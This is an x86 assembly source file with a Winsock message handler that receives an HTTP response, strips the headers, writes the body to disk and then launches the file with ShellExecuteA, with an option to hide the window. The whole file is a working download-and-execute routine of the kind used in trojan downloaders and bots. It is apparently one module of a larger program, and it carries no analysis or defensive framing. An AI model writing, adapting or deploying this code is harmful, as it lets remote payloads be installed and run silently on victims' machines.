.386P
.Model Flat ,StdCall

INCLUDE	defines.inc

SW_HIDE			EQU	0
SW_SHOW			EQU	5
GENERIC_WRITE		EQU	40000000h
FILE_FLAG_RANDOM_ACCESS	EQU	10000000h
FILE_FLAG_WRITE_THROUGH	EQU	80000000h
CREATE_ALWAYS		EQU	2
INVALID_HANDLE_VALUE	EQU	-1

extrn	closesocket	: PROC
extrn	recv		: PROC
extrn	CreateFileA	: PROC
extrn	WriteFile	: PROC
extrn	CloseHandle	: PROC
extrn	ShellExecuteA	: PROC
extrn	HeapFree	: PROC
extrn	HeapReAlloc	: PROC

extrn	strstr		: PROC
extrn	atoi		: PROC
extrn	Http_Data	: DWORD
extrn	PacketBuffer	: DWORD
extrn	Memory_Heap	: DWORD

.Data
	FileHandle	DD	?
	dumb		DD	?
	HTTP_STARTCHECK	DB	0Dh, 0Ah, 0Dh, 0Ah, 0
	TXT_CONTENTLEN	DB	'Content-Length:', 0

.Code

; when we receive data from web server....

PUBLIC		Msg_HttpProc
Msg_HttpProc	PROC, hwnd:DWORD, wmsg:DWORD, wParam:DWORD, lParam:DWORD
	mov	edi, wmsg
	sub	edi, MSG_HTTP
	imul	edi, HTTP_STRUC_
	add	edi, Http_Data

	mov	eax, lParam
	cmp	ax, FD_READ
	je	@@HTTP_READ
	cmp	ax, FD_CLOSE
	jne	@@HttpProc_Ret

;*******HTTP: FD_CLOSE*******
	call	closesocket, [edi].http_sock
	mov	[edi].http_sock, -1

	cmp	BYTE PTR [edi], 0
	je	@@HTTP_CLOSE1

	cmp	[edi].http_cursize, 0
	jnz	@@HTTP_CLOSE2
	cmp	[edi].http_datasize, -1
	jne	@@HTTP_CLOSE1
	mov	eax, [edi].http_buffer
	mov	[edi].http_data, eax
	mov	eax, [edi].http_readlen
	mov	[edi].http_cursize, eax
@@HTTP_CLOSE2:
	call	CreateFileA, edi, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_FLAG_RANDOM_ACCESS+FILE_FLAG_WRITE_THROUGH, 0
	cmp	eax, INVALID_HANDLE_VALUE
	je	@@HTTP_CLOSE1
	mov	FileHandle, eax

	call	WriteFile, eax, [edi].http_data, [edi].http_cursize, OFFSET dumb, 0
	call	CloseHandle, FileHandle

	cmp	[edi].http_exe, 0
	jz	@@HTTP_CLOSE1

	mov	eax, SW_HIDE
	cmp	[edi].http_exe, 1
	je	@@HTTP_CLOSE11
	cmp	[edi].http_exe, 2
	jne	@@HTTP_CLOSE1
	mov	eax, SW_SHOW
@@HTTP_CLOSE11:
	call	ShellExecuteA, 0, 0, edi, 0, 0, eax

@@HTTP_CLOSE1:
	call	HeapFree, Memory_Heap, 0, [edi].http_buffer
	mov	[edi].http_bufsize, 0
@@HttpProc_Ret:
	ret


;*******HTTP: FD_READ********
@@HTTP_READ:
	mov	dumb, edi

	call	recv, [edi].http_sock, PacketBuffer, HTTP_BUF_SIZE, 0
	or	eax, eax
	jz	@@HttpProc_Ret
	cmp	eax, SOCKET_ERROR
	je	@@HttpProc_Ret

	mov	ebx, edi
	mov	ecx, eax
	mov	esi, PacketBuffer
	mov	edi, [ebx].http_buffer
	add	edi, [ebx].http_readlen
	add	[ebx].http_readlen, eax
	cld
	rep	movsb
	xor	al, al
	stosb

	mov	edi, [ebx].http_buffer
	mov	esi, OFFSET TXT_CONTENTLEN
	call	strstr
	or	edi, edi
	jz	@@HTTP_READ2

	add	edi, 16
	mov	esi, edi
	call	atoi
	mov	edi, dumb
	mov	[edi].http_datasize, ebx
@@HTTP_READ2:
	mov	edi, dumb

	mov	eax, [edi].http_datasize
	add	eax, 2048
	cmp	eax, [edi].http_bufsize
	jbe	@@HTTP_READ3

	mov	[edi].http_bufsize, eax
	call	HeapReAlloc, Memory_Heap, HEAP_GENERATE_EXCEPTIONS, [edi].http_buffer, eax
	mov	[edi].http_buffer, eax

@@HTTP_READ3:
	mov	ebx, dumb
	mov	edi, [ebx].http_buffer
	mov	esi, OFFSET HTTP_STARTCHECK
	call	strstr
	or	edi, edi
	jz	@@HttpProc_Ret

	add	edi, 4
	mov	ebx, dumb

	mov	[ebx].http_data, edi
	mov	eax, [ebx].http_buffer
	add	eax, [ebx].http_readlen
	sub	eax, edi
	mov	[ebx].http_cursize, eax
	jmp	@@HttpProc_Ret

Msg_HttpProc	ENDP

END
